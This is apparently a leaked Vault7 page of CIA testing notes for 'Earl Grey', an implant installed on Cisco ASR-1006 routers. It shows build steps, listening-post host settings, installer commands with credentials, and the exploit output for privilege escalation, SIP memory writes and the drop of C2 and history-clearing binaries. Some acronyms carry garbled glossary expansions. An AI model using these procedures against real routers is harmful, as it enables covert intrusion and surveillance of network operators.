Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Owner: User #1179928
Earl Grey v1.0.0 Testing
CONOP:
Summary:
Testing Notes:
- On Earl-Grey build VM, login with eg_build / eg_build (su - 10sne1)
- Edit /home/eg-build/Earl_Grey_v1.0.0/common/config.h
-
vi config.h
- LP_HOST1 "X.X.X.XX (LVLT-GOGL-8-8-8[US])"
- LP_HOST2 "X.X.X.XX (LVLT-GOGL-8-8-8[US])"
- LP_HOST3 "127.0.0.1"
-
-
cd /home/eg-build/Earl_Grey_v1.0.0/build/release/cd ../../..
make clean release
ls -l ./build/release/
- From ICON1 (Move build from eg-build VMVirtual Machine to ICON1 VMVirtual Machine)
root@debian:/etc# scp -r root@172.20.12.105:/home/eg-build/Earl_Grey_v1.0.0/build/release /home/user1
- root@debian:/home/user1/release# python earlgrey_installer.py XXX.XX.XXX.XX (ORACLE-AT[US]) cisco cisco password ASR-1006 ./test_log c2_manager clear_exp_history
-
Receive the following output:
== Exploit version 30502 ==
[+] Generating random names for the c2 and clear sip history binaries
c2_manager is now wdotiutq (9191b039896bd7c12ec984288a300a2b)
clear_exp_history is now aswulpmp (8652da573ae103299f6c12b14c874bd7)
[+] wdotiutq.tar.gz size: 34131 bytes
[+] aswulpmp.tar.gz size: 2256 bytes
[+] Logging into ASR-1006 as 'cisco@XXX.XX.XXX.XX (ORACLE-AT[US])' via telnet
[+] Escalating privileges
[+] Dropping down into SIPSession Initiation Protocol (Internet Telephony) console
Exception during our attempt to get the SIPSession Initiation Protocol (Internet Telephony) console: Timeout exceeded.
<expect_telnet.expectlogtelnet object at 0x7fc0929dce10>
version: 3.2
command: /usr/bin/telnet
args: ['/usr/bin/telnet', 'XXX.XX.XXX.XX (ORACLE-AT[US])']
searcher: <pexpect.searcher_re object at 0x7fc0929dce50>
buffer (last 100 chars): '0\r\nEnter interface cpu to connect to: 0\r\n%Slot 0 does not support IPCInterprocess Communications console to CPU 0.\r\n\r\nASR-1006#'
before (last 100 chars): '0\r\nEnter interface cpu to connect to: 0\r\n%Slot 0 does not support IPCInterprocess Communications console to CPU 0.\r\n\r\nASR-1006#'
after: <class 'pexpect.TIMEOUT'>
match: None
match_index: None
exitstatus: None
flag_eof: False
pid: 12367
child_fd: 3
closed: False
timeout: 30
delimiter: <class 'pexpect.EOF'>
logfile: <open file '././test_log', mode 'w+' at 0x7fc0929e5a50>
logfile_read: None
logfile_send: None
maxread: 2000
ignorecase: False
searchwindowsize: None
delaybeforesend: 0.05
delayafterclose: 0.1
delayafterterminate: 0.1
- Spoke to Will at the Bakery on the install failure above. They had me run the following on our ASR:
ASR-1006#ipc-con
Enter interface slot to connect to: 0
Enter interface cpu to connect to: 0
%Slot 0 does not support IPCInterprocess Communications console to CPU 0.- This seems to indicate that there is an issue with config/hardware that will NOT allow the EGEarl Grey (Project name) implant to install
- Waiting for callback from User #? (0931 10/9)
- After speaking with User #77611, it was determined that since I do not have a SPA interface card in slot 0/0, this delivery will not work with the current hardware configuration.
- I removed the 5x1Gig SPA card from slot 0/2 and put it into 0/0 and was able to do a "ipc-con" "0 0" via the IOS
- From ICON1
root@debian:/etc# scp -r root@172.20.12.105:/home/eg-build/Earl_Grey_v1.0.0/build/release /home/user1
-
root@debian:/home/user1/release# python earlgrey_installer.py XXX.XX.XXX.XX (ORACLE-AT[US]) cisco cisco password ASR-1006 ./test_log c2_manager clear_exp_history
-
Received the following output after the installer was stuck and hung for approximately 30 minutes
== Exploit version 30502 ==
[+] Generating random names for the c2 and clear sip history binaries
c2_manager is now iyucoycj (9191b039896bd7c12ec984288a300a2b)
clear_exp_history is now tlohvidm (8652da573ae103299f6c12b14c874bd7)
[+] iyucoycj.tar.gz size: 34131 bytes
[+] tlohvidm.tar.gz size: 2259 bytes
[+] Logging into ASR-1006 as 'cisco@XXX.XX.XXX.XX (ORACLE-AT[US])' via telnet
[+] Escalating privileges
[+] Dropping down into SIPSession Initiation Protocol (Internet Telephony) console
[+] Computing offsets for writing into SIPSession Initiation Protocol (Internet Telephony) memory
^CTraceback (most recent call last):
File "earlgrey_installer.py", line 639, in <module>
if sip_writer.findWriteOffet(expect) == False:
File "earlgrey_installer.py", line 30, in findWriteOffet
expect.sendcommand('term length 0', sendline = True, waitforprompt=True)
File "/home/user1/release/expect_telnet.py", line 75, in sendcommand
return self.getprompt(sendline = sendline, timeout = timeout)
File "/home/user1/release/expect_telnet.py", line 68, in getprompt
self.drain()
File "/home/user1/release/expect_telnet.py", line 62, in drain
r = self.expect([".*", pexpect.TIMEOUT, pexpect.EOF], timeout = .1)
File "/usr/lib/python2.7/dist-packages/pexpect/__init__.py", line 1417, in expect
return self.expect_list(compiled_pattern_list,
- Restarted ASRAzure Site Recovery to try again....same result as previous.
-
Received the following output after the installer was stuck and hung for approximately 30 minutes
- dw_checker.py
- Using "-i" option in Makefiles to ignore matches from the dirty word checker. Appears that the result of this is that if matches are found compilation will continue along, forcing user to look through make scrollback to see if there were any dirty word hits of concern. They probably did this to get around false positive matches, but the result that it is very likely that legitimate matches will be missed ==> open defect